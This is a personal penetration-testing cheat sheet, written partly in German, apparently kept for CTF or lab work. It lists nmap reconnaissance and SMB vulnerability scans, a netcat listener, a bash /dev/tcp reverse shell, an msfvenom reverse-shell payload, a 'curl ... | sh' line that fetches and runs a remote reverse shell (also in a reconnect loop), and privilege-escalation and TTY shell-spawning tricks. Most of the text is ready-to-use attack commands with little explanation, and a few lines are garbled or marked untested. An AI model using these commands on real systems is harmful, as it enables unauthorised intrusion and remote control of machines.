#### to install: - magic wormhole - tldr - rlwrap - ```bash sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap ``` #### for keyring -> if there is some kind of keyring error ```bash sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg ``` # information gathering ### nmap for quick scan of available ips ```bash nmap -sn ip/24 ``` to filter output for open ips ```bash nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt ``` scan open ports: ```bash nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155 ``` #### bei windows ```bash nmap --vuln ip ``` ##### bei windows \+ smb ```bash nmap --script vuln-smb* ip nicht mehr sicher welches es war nmap --script smb-vuln* ip ``` # inital access ### start listener: ```bash rlwrap -cAr nc -nlvp 9002 ``` ### reverse shell bash: ```bash /bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1 ``` ### reverse shell file: ```bash msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py ``` -> from revshells.com ### untested: Reverse Shell as a Service 1. On your machine: ```bash nc -l 1337 or nlvp? ``` 2. On the target machine: ```bash curl https://reverse-shell.sh/yourip:1337 | sh ``` #### reconnecting: ```bash while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done ``` # privilege escalation ### always run these: ```bash sudo -l ``` if sudo doesn't work: [[#^78d3ce|spawn shell]] #### check cronjobs ```bash ls /etc/cron.* crontab -l ``` ## TTY Spawn Shell ##### if sudo still doesn't work use ```bash sudo -S command ``` Often during pen tests you may obtain a shell without having tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages. ### Python spawn shell ```bash python -c 'import pty; pty.spawn("/bin/bash")' ``` Fully Interactive TTY #### All the steps to stabilize your shell **The first step:** ```bash python3 -c 'import pty;pty.spawn("/bin/bash")' ``` Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won’t be able to use tab autocomplete or the arrow keys. **Step two is:** ```bash export TERM=xterm ``` This will give us access to term commands such as clear. **Finally (and most importantly) we will background the shell using** ```bash Ctrl + Z ``` Back in our own terminal we use ```bash stty raw -echo; fg ``` This does two things: first, it turns off our own terminal echo which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes ```bash stty rows 38 columns 116 ``` ### OS system spawn shell ```bash echo os.system("/bin/bash") ``` ### Bash spawn shell ```bash /bin/sh -i ``` ### Perl spawn shell ```bash perl —e 'exec "/bin/sh";' ``` ### Ruby spawn shell ruby: exec "/bin/sh" ### Lua spawn shell lua: os.execute("/bin/sh") ### IRB spawn shell exec "/bin/sh" ### VI spawn shell ```bash :!bash ``` ### VI(2) spawn shell ```bash :set shell=/bin/bash:shell ``` ### Nmap spawn shell ```bash !sh ``` #### Exiftools Metadaten auslesen: ```bash exiftool picture.png ``` Binwalk (Binary Daten exportieren): ```bash binwalk -e picture.png ```